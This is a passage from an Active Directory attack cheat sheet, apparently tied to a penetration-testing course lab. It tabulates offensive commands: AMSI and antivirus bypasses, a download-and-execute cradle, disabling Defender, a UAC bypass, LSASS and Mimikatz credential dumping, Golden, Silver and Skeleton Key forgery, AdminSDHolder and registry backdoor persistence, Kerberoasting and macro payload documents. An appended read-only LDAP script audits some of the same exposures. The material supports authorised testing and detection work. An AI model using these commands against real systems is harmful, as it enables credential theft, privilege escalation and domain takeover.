Tool | Command | Description | Links |
---|---|---|---|
PowerShell | Get-Help <cmdlet> | Shows the help page for a cmdlet | |
PowerShell | Get-Help process | Lists help topics whose name contains "process" | |
PowerShell | Get-Command -CommandType cmdlet | Lists all cmdlets | |
PowerShell | Get-Process | Lists running processes | |
PowerShell | PowerShell Execution Policy Bypass (e.g. powershell -ep bypass) | Bypasses the execution policy; it is a usability setting, not a security boundary | |
PowerShell | PowerShell AV Bypass Runner | Runs payloads while evading AV | |
PowerShell | AMSI Bypass | Bypasses AMSI so script content is not scanned before execution | |
PowerShell | $ADClass = [System.DirectoryServices.ActiveDirectory.Domain]; $ADClass::GetCurrentDomain() | Enumerates the current domain with .NET only (no PowerView needed) | |
PowerShell | Download Cradles | Various ways to download and execute files, e.g. iex (New-Object Net.WebClient).DownloadString('<url>') | |
PowerShell | Set-MpPreference -DisableRealtimeMonitoring $true | Disables Defender real-time monitoring; requires local admin and is blocked when Tamper Protection is on | |
PowerShell | $ExecutionContext.SessionState.LanguageMode | Checks for Constrained Language Mode (FullLanguage vs ConstrainedLanguage) | |
PowerShell | Fodhelper UAC Bypass | Writes HKCU:\Software\Classes\ms-settings\Shell\Open\command so that the auto-elevating fodhelper.exe runs the payload; only works for members of the local Administrators group at the default UAC level | |
PowerShell | FodHelper AV Bypass and Workstation Takeover | Execution chain combining the fodhelper UAC bypass with AV evasion to take over the workstation | |
PowerShell | LSASS Dump with Comsvcs | Dumps LSASS memory through the MiniDump export of comsvcs.dll (rundll32 comsvcs.dll, MiniDump <lsass PID> <file> full; needs SeDebugPrivilege) and parses the dump offline | |
PowerShell | Reflection Shellcode Runner | Uses .NET reflection in PowerShell to resolve and invoke Win32 API calls in memory | |
PowerShell | AdminSDHolder Enumeration | Enumerates the AdminSDHolder DACL for non-default ACEs that SDProp would stamp onto every protected group | |
PowerShell | Sysvol Enumeration | Searches SYSVOL (e.g. Group Policy Preferences XML with a cpassword value) for credentials and other information | |
PowerShell | LAPS Dump | Reads ms-Mcs-AdmPwd (the LAPS local admin password) of every computer where the current user has read rights on that attribute | |
PowerView | . .\PowerView.ps1 | Dot-sources PowerView into the current session | |
PowerView | Get-NetUser | Shows domain users | |
PowerView | Get-NetUser \| select -ExpandProperty samaccountname | Shows only the samaccountname of each user | |
PowerView | Get-UserProperty | Lists user properties (e.g. -Properties pwdlastset to spot old passwords) | |
PowerView | Find-UserField -SearchField Description -SearchTerm "pass" | Searches a user attribute (here the description field) for interesting strings such as passwords | |
PowerView | Get-NetComputer | Enumerates domain member computers | |
PowerView | Resolve-IPAddress -ComputerName <host> | Resolves a computer name to its IP address | |
PowerView | Get-NetDomain / Get-NetDomain -Domain <domain> | Gets the current domain or another (trusted) domain | |
PowerView | Get-DomainSID | Gets the domain's SID | |
PowerView | Get-DomainPolicy | Gets the domain policy (password, lockout and Kerberos settings) of the current domain | |
PowerView | Get-NetDomainController -Domain domain.local | Gets the domain controllers of a domain | |
PowerView | Get-NetGroup / Get-NetGroup -GroupName "Domain Admins" -FullData | Lists domain groups, or the attributes of one group such as Domain Admins | |
PowerView | Get-NetLocalGroup -ComputerName <host> | Lists the members of a local group (Administrators by default); -ListGroups lists the groups themselves | |
PowerView | Get-NetGroupMember -GroupName "Domain Admins" | Enumerates Domain Admins group members | |
PowerView | Get-NetGroupMember -GroupName "Enterprise Admins" -Domain <forest root domain> | Enumerates Enterprise Admins, which exist only in the forest root domain | |
PowerView | Get-NetLoggedon -ComputerName <host> | Gets users logged on to a machine | |
PowerView | Invoke-ShareFinder -ExcludeStandard -ExcludePrint -ExcludeIPC -Verbose | Finds non-default shares | |
PowerView | Invoke-FileFinder | Finds files with sensitive-looking names on shares across the domain | |
PowerView | Get-NetFileServer | Finds file servers (derived from users' home directory, profile path and logon script attributes) | |
Domain Enumeration - GPO | |||
PowerView | Get-NetGPOGroup -Verbose | Enumerates Restricted Groups (and GPP groups.xml) settings pushed via GPO | |
PowerView | Get-NetOU | Lists organizational units (OUs) | |
PowerView | Get-NetOU <OUname> \| %{Get-NetComputer -ADSPath $_} | Lists all computers in the OU | |
PowerView | Get-NetGPO | Shows the names of all GPOs | |
PowerView | Get-NetGPO -ADSpath 'LDAP://cn={3E04167E-C2B6-4A9A-8FB7-C811158DC97C},cn=policies,cn=system,DC=dollarcorp,DC=moneycorp,DC=local' | Enumerates a GPO by the GUID found in an OU's gplink attribute (lab example: the GPO applied to the StudentMachines OU) | |
PowerView | Find-GPOComputerAdmin -ComputerName <host> | Finds users and groups given local admin on a computer through GPO | |
PowerView | Get-NetGPOGroup | Gets GPOs that use Restricted Groups or groups.xml to put interesting users into local groups | |
Domain Enumeration - ACL | |||
PowerView | Get-ObjectAcl -SamAccountName <name> -ResolveGUIDs | Enumerates the access control list (ACL) of an AD object | |
PowerView | Get-PathAcl -Path "\\<server>\<share>" | Gets the ACL of a file system path or share | |
PowerView | Invoke-ACLScanner -ResolveGUIDs | Scans the domain for interesting ACEs (modify rights held by non-built-in principals) | |
PowerView | Find-GPOLocation -UserName <user> | Gets machines where the given user is put into a local group (e.g. Administrators) through GPO | |
Domain Enumeration - Trusts | |||
PowerView | Get-NetDomainTrust | Get a list of all domain trusts for the current domain | |
PowerView | Get-NetForest | Get details about the current forest | |
PowerView | Get-NetForestDomain | Get all domains in the current forest | |
PowerView | Get-NetForestCatalog | Get all global catalogs for the current forest | |
PowerView | Get-NetForestTrust | Maps trusts of a forest | |
User Hunting | |||
PowerView | Find-LocalAdminAccess -Verbose | Finds machines in the domain where the current user has local admin access | |
PowerView | Invoke-EnumerateLocalAdmin -Verbose | Enumerates the members of the local Administrators group on all domain machines | |
PowerView | Invoke-UserHunter -CheckAccess | Finds computers where a user (Domain Admins by default) has a session and whether the current user has admin access there | |
PowerView | Invoke-Command -ScriptBlock {whoami} -ComputerName <host> | Runs commands on hunted machines over PowerShell Remoting | |
Privilege Escalation | |||
PowerUp | . .\PowerUp.ps1 | Dot-sources PowerUp into the current session | |
PowerUp | Invoke-AllChecks | Checks for all common privilege escalation paths | |
PowerUp | Get-ServiceUnquoted -Verbose | Checks for unquoted service binary paths that contain spaces | |
PowerUp | Get-ModifiableServiceFile -Verbose | Finds services whose binary (or its arguments) the current user can write to or change | |
PowerUp | Get-ModifiableService -Verbose | Gets services whose configuration the current user can modify | |
PowerUp | Invoke-ServiceAbuse -Name <service> -UserName '<domain>\<user>' | Abuses a modifiable service (from Get-ModifiableService) to add the given user to the local Administrators group | |
Find Remoting Local Admin Access | |||
Find-PSRemotingLocalAdminAccess | . .\Find-PSRemotingLocalAdminAccess.ps1 | Loads the module | |
Find-PSRemotingLocalAdminAccess | Find-PSRemotingLocalAdminAccess | Hunts for machines where the current user has local admin access via PowerShell Remoting | |
Find-PSRemotingLocalAdminAccess | Enter-PSSession -ComputerName <host> | Enters an interactive PowerShell Remoting session on a found machine | |
Script Block | Invoke-Command -ScriptBlock {...} -ComputerName <host> | Runs a script block (or, with -FilePath, a whole script) on remote machines via PowerShell Remoting | |
PowerShell | Get-AppLockerPolicy -Effective | Enumerates the effective AppLocker policy and its rules | |
PowerView | Add-ObjectAcl -TargetADSprefix 'CN=AdminSDHolder,CN=System' -PrincipalSamAccountName <user> -Rights All | Persistence: rights added to AdminSDHolder are copied to every protected group (Domain Admins etc.) when SDProp runs, by default every 60 minutes | |
Invoke-SDPropagator | Invoke-SDPropagator -showProgress -timeoutMinutes 1 | Forces SDProp to run immediately instead of waiting for its 60-minute interval | |
PowerView_dev | Add-DomainGroupMember -Identity 'Domain Admins' -Members <user> | Adds a user to a group (e.g. Domain Admins) once rights on the group allow it | |
Mimikatz | |||
Mimikatz | Invoke-Mimikatz (default -DumpCreds) | Dumps credentials from LSASS memory (sekurlsa::logonpasswords); requires local admin/SYSTEM | |
Mimikatz | Invoke-Mimikatz -Command '"lsadump::lsa /patch"' | Dumps the NTLM hashes of all domain accounts; run on a DC | |
Mimikatz | Invoke-Mimikatz -Command '"lsadump::sam"' | Dumps local account hashes from the SAM (requires local admin) | |
Mimikatz | Invoke-Mimikatz -Command '"kerberos::golden /User:Administrator /domain:<fqdn> /sid:<domain SID> /krbtgt:<krbtgt NTLM> /ptt"' | Creates a Golden Ticket (forged TGT); requires the krbtgt account's NTLM hash or AES key and the domain SID, not a ticket | |
Mimikatz | Invoke-Mimikatz -Command '"kerberos::golden /domain:<fqdn> /sid:<domain SID> /target:<host fqdn> /service:CIFS /rc4:<service account NTLM> /User:Administrator /ptt"' | Creates a Silver Ticket (forged service ticket) from the service or machine account's hash; grants access to that service only and never touches the DC | |
Mimikatz | Invoke-Mimikatz -Command '"misc::skeleton"' (on a DC) | Skeleton Key persistence: patches LSASS on the DC so every user also authenticates with the master password "mimikatz"; does not survive a reboot | |
DAMP | Add-RemoteRegBackdoor -ComputerName <dc> -Trustee <user> | Modifies registry ACLs on the DC (installing it needs admin on the DC) so that the trustee can later pull machine account and cached credential material remotely via the registry without being a Domain Admin | |
Constrained/Unconstrained Delegation | |||
PowerView | Get-NetComputer -Unconstrained | Lists computers with unconstrained delegation (TRUSTED_FOR_DELEGATION); domain controllers appear by default | |
PowerView_Dev | Get-NetComputer -TrustedToAuth | Lists computers with constrained delegation (msDS-AllowedToDelegateTo set) | |
Get-ServiceAcl | . .\Get-ServiceAcl.ps1; Get-ServiceAcl -Name <service> | Shows the DACL of a service, i.e. which principals may start, stop or reconfigure it | |
Kerberoasting | |||
PowerView | Get-NetUser -SPN | Lists user accounts with a ServicePrincipalName set (Kerberoast candidates) | |
Impacket | GetUserSPNs.py <domain>/<user>:<password> -dc-ip <DC IP> -request | Lists user SPNs and requests their service tickets (TGS-REP hashes) for offline cracking | |
Rubeus | Rubeus.exe kerberoast | Requests service tickets for all SPN-bearing users and outputs the crackable hashes | |
ASREPRoasting | |||
Impacket | GetNPUsers.py <domain>/ -usersfile users.txt -format hashcat -dc-ip <DC IP> | Lists users with "Do not require Kerberos preauthentication" set and requests their AS-REP hashes | |
Rubeus | Rubeus.exe asreproast | Finds AS-REP roastable accounts and requests their AS-REP hashes | |
Out-Word (Nishang) | Out-Word -Payload "<command>" -OutputFile doc.doc | Generates a Word document whose macro runs the payload | |
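
The rows above name the PowerView, Impacket and Rubeus commands but not the directory queries they issue. The script below is an added example, not part of this cheat sheet, PowerView or any other tool listed, and reproduces those queries with plain .NET/ADSI: the Kerberoast and AS-REP roast candidates, the unconstrained and constrained delegation checks, the Constrained Language Mode check, and a read-only audit of the AdminSDHolder DACL as the defensive side of the AdminSDHolder rows. It assumes a domain-joined host, a user allowed to read the directory (any domain user by default) and FullLanguage mode; the function names and the AdminSDHolder trustee baseline are this example's own choices and the baseline must be adjusted to the environment.

```powershell
# Added example (not from the original cheat sheet or PowerView): the LDAP queries behind
# several rows above, issued with plain .NET/ADSI so no external module is needed.
# Assumptions: domain-joined host, a domain user that can read the directory, FullLanguage mode.
# Every function only reads; nothing here changes the directory.

# userAccountControl bits used in the filters below
$UAC_TRUSTED_FOR_DELEGATION = 0x80000    # unconstrained delegation
$UAC_DONT_REQUIRE_PREAUTH   = 0x400000   # AS-REP roastable

function Test-LanguageMode {
    # Constrained Language Mode refuses New-Object on arbitrary .NET types, so the
    # DirectorySearcher below would fail; check before doing anything else.
    $mode = $ExecutionContext.SessionState.LanguageMode
    if ($mode -ne 'FullLanguage') { throw "LanguageMode is $mode; this script needs FullLanguage" }
    $mode
}

function Invoke-LdapQuery {
    param(
        [Parameter(Mandatory)][string]$Filter,
        [string[]]$Properties = @('samaccountname'),
        [string]$SearchBase        # e.g. 'LDAP://DC=corp,DC=local'; default is the current domain
    )
    $root = if ($SearchBase) { [ADSI]$SearchBase } else { [ADSI]'' }   # [ADSI]'' = default naming context
    $searcher = New-Object System.DirectoryServices.DirectorySearcher($root, $Filter)
    $searcher.PageSize = 1000          # page the results; otherwise the DC silently caps them at 1000
    foreach ($p in $Properties) { [void]$searcher.PropertiesToLoad.Add($p) }
    foreach ($r in $searcher.FindAll()) {
        $o = [ordered]@{}
        foreach ($p in $Properties) { $o[$p] = @($r.Properties[$p.ToLower()]) }
        [pscustomobject]$o
    }
}

# Kerberoast candidates (Get-NetUser -SPN / GetUserSPNs.py): user objects with an SPN, minus krbtgt.
# samAccountType=805306368 selects user objects; pwdLastSet shows how old the password is.
function Get-KerberoastableUser {
    Invoke-LdapQuery -Filter '(&(samAccountType=805306368)(servicePrincipalName=*)(!(samAccountName=krbtgt)))' `
                     -Properties samaccountname, serviceprincipalname, pwdlastset |
        ForEach-Object {
            [pscustomobject]@{
                SamAccountName = $_.samaccountname[0]
                SPNs           = $_.serviceprincipalname -join '; '
                PwdLastSet     = if ($_.pwdlastset) { [datetime]::FromFileTimeUtc([int64]$_.pwdlastset[0]) }
            }
        }
}

# AS-REP roast candidates (GetNPUsers.py / Rubeus asreproast): DONT_REQUIRE_PREAUTH set.
# 1.2.840.113556.1.4.803 is the LDAP_MATCHING_RULE_BIT_AND rule for bit-flag attributes.
function Get-AsrepRoastableUser {
    Invoke-LdapQuery -Filter "(&(samAccountType=805306368)(userAccountControl:1.2.840.113556.1.4.803:=$UAC_DONT_REQUIRE_PREAUTH))"
}

# Unconstrained delegation (Get-NetComputer -Unconstrained). Domain controllers always appear here.
function Get-UnconstrainedDelegationComputer {
    Invoke-LdapQuery -Filter "(&(objectCategory=computer)(userAccountControl:1.2.840.113556.1.4.803:=$UAC_TRUSTED_FOR_DELEGATION))" `
                     -Properties samaccountname, dnshostname
}

# Constrained delegation (Get-NetComputer -TrustedToAuth): any object with msDS-AllowedToDelegateTo populated.
function Get-ConstrainedDelegationObject {
    Invoke-LdapQuery -Filter '(msDS-AllowedToDelegateTo=*)' -Properties samaccountname, 'msds-allowedtodelegateto'
}

# AdminSDHolder audit, the defensive counterpart of the AdminSDHolder rows: list every ACE on
# CN=AdminSDHolder,CN=System and flag trustees outside an expected baseline. The baseline is an
# assumption for a plain AD forest (Exchange and other products add entries); adjust it locally.
function Get-AdminSDHolderAce {
    $domainDn = "$(([ADSI]'').distinguishedName)"
    $holder   = [ADSI]"LDAP://CN=AdminSDHolder,CN=System,$domainDn"
    $baseline = 'SYSTEM','SELF','Authenticated Users','Everyone','Administrators','Domain Admins',
                'Enterprise Admins','Pre-Windows 2000 Compatible Access','Windows Authorization Access Group',
                'Terminal Server License Servers','Cert Publishers','Key Admins','Enterprise Key Admins'
    foreach ($ace in $holder.psbase.ObjectSecurity.Access) {
        $trustee = $ace.IdentityReference.Value
        [pscustomobject]@{
            Trustee    = $trustee
            Rights     = $ace.ActiveDirectoryRights
            Type       = $ace.AccessControlType
            Suspicious = $baseline -notcontains $trustee.Split('\')[-1]   # $true = not in the baseline, investigate
        }
    }
}

# Usage:
# Test-LanguageMode
# Get-KerberoastableUser | Format-Table -AutoSize
# Get-AsrepRoastableUser
# Get-UnconstrainedDelegationComputer; Get-ConstrainedDelegationObject
# Get-AdminSDHolderAce | Where-Object Suspicious
```

The same filters are what a detection engineer can use to baseline the domain: accounts returned by Get-KerberoastableUser with an old PwdLastSet and by Get-AsrepRoastableUser are the ones the Impacket and Rubeus rows above will harvest, and any ACE flagged by Get-AdminSDHolderAce is exactly what the Add-ObjectAcl persistence row leaves behind for SDProp to propagate.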